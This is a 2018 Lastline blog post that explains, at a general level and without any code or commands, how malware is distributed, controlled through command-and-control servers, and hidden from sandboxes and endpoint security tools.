How Malware Works – Malicious Strategies and Tactics

Posted by Lastline MAY 10, 2018 ON

Understanding how malware works, and in particular, the strategies and tactics most often used by malware authors is vitally important for cybersecurity professionals. In other blog posts, Lastline provides a brief history of malware and basic malware types. In this post, we’ll look at some of the common methods that malware authors use to distribute, control, and hide malicious code.

How Malware is Distributed

AV-Test, one of the most renowned institutions for testing Anti-Malware products, reports that cybercriminals push 250,000 new malicious programs into the wild every day. So, what tactics do cybercriminals use to distribute this massive amount of malware? Although new methods are constantly emerging, most malware is delivered in the following ways.

Command and Control – How Cybercriminals Manage Malware

To be useful, most malware must communicate with the cybercriminals that own and control it. The malware must transmit stolen data. Perpetrators behind the crimes need to coordinate how and when sophisticated attacks are launched, propagated, and in some cases, how the malware terminates and remains undetected.

This necessary communication is generally handled by command-and-control servers established by the cybercriminals. These command-and-control servers, also called C&Cs or C2s, are used by the attackers to communicate with compromised computers, websites, smartphones, routers, IoT devices, and other networking equipment.

Cybercriminals use C&Cs to instruct and manage individual instances of malware or entire botnets of compromised systems. Most malware is designed to respond to specific instructions received from one or more C&C servers. Using the associated C&C server(s), the attackers direct the malware to perform a number of malicious actions, including:

Upload reports regarding the malware’s status and results of C&C commands

Install upgrades to the malware or new pieces of malware to expand the attack

Install keyloggers used to collect sensitive information such as credit card numbers or login credentials

Transmit Spam or Phishing emails

Launch coordinated DDoS attacks

Transmit back to the criminal stolen data such as login credentials, sensitive user data, payment card numbers, corporate intellectual property or financial data, etc.

Advanced malware detection products monitor network traffic for connections to known C&Cs, and for traffic that contains C&C communications. When these tools discover malicious traffic, administrators can block the connections and, in some cases, identify and remove the responsible malware.

Malware authors use several strategies for hiding their C&C communications from malware detection systems. For example, cybercriminals often use covert channels such as Internet Relay Chat (IRC), peer-to-peer technology (P2P), and social networks like Facebook and Twitter to hide their communications. The most advanced methods have the ability to quickly switch C&C servers to avoid detection. Some C&C servers have a lifespan of just minutes before another server replaces them.

How Malware Hides – Evasion Tactics

Malware authors are very creative. They use countless tactics to lessen the likelihood that security tools will detect their malware. Earlier in this post when we discussed malware distribution, we covered how cybercriminals hide malware in websites, attachments, and advertisements during the initial delivery phase of an attack.

When an attempt is made to download a malicious object, either by a user or their browser, sandboxes are often used to test the object for malicious capabilities. To counter this, malware authors deploy numerous tactics to try to hide from sandboxes. If malware does find its way to an endpoint, malware designers use additional strategies to maintain their stealth.

Sandbox Evasion Tactics

Fragmentation : A technology that splits malware into several components that only execute when the targeted system reassembles the code.

: A technology that splits malware into several components that only execute when the targeted system reassembles the code. Time Delays : The malware remains idle for an extended period, avoiding all malicious activity until (the criminal hopes) the file is released to the intended user.

: The malware remains idle for an extended period, avoiding all malicious activity until (the criminal hopes) the file is released to the intended user. User Action Delays : Some malware avoids doing anything malicious until a user performs a specific action (e.g. a mouse click, pressing a key, opening or closing a file, exiting the program).

: Some malware avoids doing anything malicious until a user performs a specific action (e.g. a mouse click, pressing a key, opening or closing a file, exiting the program). Return-Oriented Programming (ROP) : A technique where malware injects functionality into another process without modifying the code of that process. To accomplish this, malware alters the contents of the stack (the set of memory addresses that tells the system which segment of code to execute next).

: A technique where malware injects functionality into another process without modifying the code of that process. To accomplish this, malware alters the contents of the stack (the set of memory addresses that tells the system which segment of code to execute next). Rootkits : A Rootkit is an application (or set of applications) that hides malicious code in the lower layers of the operating system.

: A Rootkit is an application (or set of applications) that hides malicious code in the lower layers of the operating system. Polymorphism: Polymorphic malware is so named because it morphs, or mutates, into many forms, and does so very quickly—constantly creating new variations of itself, which makes it nearly impossible to detect using signature-based malware detection tools.

To learn more about sandbox evasion tactics, see Lastline’s paper An Introduction to Advanced Malware and How it Avoids Detection.

Endpoint Evasion Tactics

In addition to using covert C&C communication channels as discussed earlier, malware authors use a number of tactics to avoid having their malware detected after installation. Here are just a few of those tactics:

Unique Signatures : Most malware today is a one-of-a-kind. To avoid detection by signature-based anti-virus solutions, cybercriminals have developed automated systems that create a unique malicious object for each installation.

: Most malware today is a one-of-a-kind. To avoid detection by signature-based anti-virus solutions, cybercriminals have developed automated systems that create a unique malicious object for each installation. Critical System Files : Malware often masquerades as a legitimate system file. By replacing original system files with compromised versions of the same, endpoint malware detection systems have difficulty spotting the malicious code.

: Malware often masquerades as a legitimate system file. By replacing original system files with compromised versions of the same, endpoint malware detection systems have difficulty spotting the malicious code. Disabling Endpoint Security : Some malware is able to evade certain endpoint antivirus tools by disabling the tool or adding an exception.

: Some malware is able to evade certain endpoint antivirus tools by disabling the tool or adding an exception. Windows Registry : Hiding malicious code within the Windows registry is a common malware tactic because no additional files are installed.

: Hiding malicious code within the Windows registry is a common malware tactic because no additional files are installed. Temporary Files, Folders or Directories : Malware scans are often configured to analyze a specific set of files and folders. So, malware authors use or create temporary or uncommon files and folders that aren’t typically scanned in which to hide their code.

: Malware scans are often configured to analyze a specific set of files and folders. So, malware authors use or create temporary or uncommon files and folders that aren’t typically scanned in which to hide their code. In Shortcuts : Commonly known as shortcuts, malware writers have used Shell Link Binary Files for years to hide and launch malware. Recently, we’ve seen a resurgence of their usage.

: Commonly known as shortcuts, malware writers have used Shell Link Binary Files for years to hide and launch malware. Recently, we’ve seen a resurgence of their usage. Within Macros: Inserting malicious macros inside of otherwise legitimate-looking documents like Microsoft Excel files has reemerged as a popular technique to hide malware.

To Safeguard Your Company Against a Cyberbreach—Think Like a Cybercriminal

By understanding the strategies and tactics that malware authors use when creating malicious objects, security professionals stand a better chance of establishing effective cybersecurity policies and implementing successful tools to detect and prevent data breaches.

To learn more about how malware works and what organizations can do to safeguard themselves against even the most advanced malware, you might want to read Lastline’s paper An Introduction to Advanced Malware and How to Avoid Detection.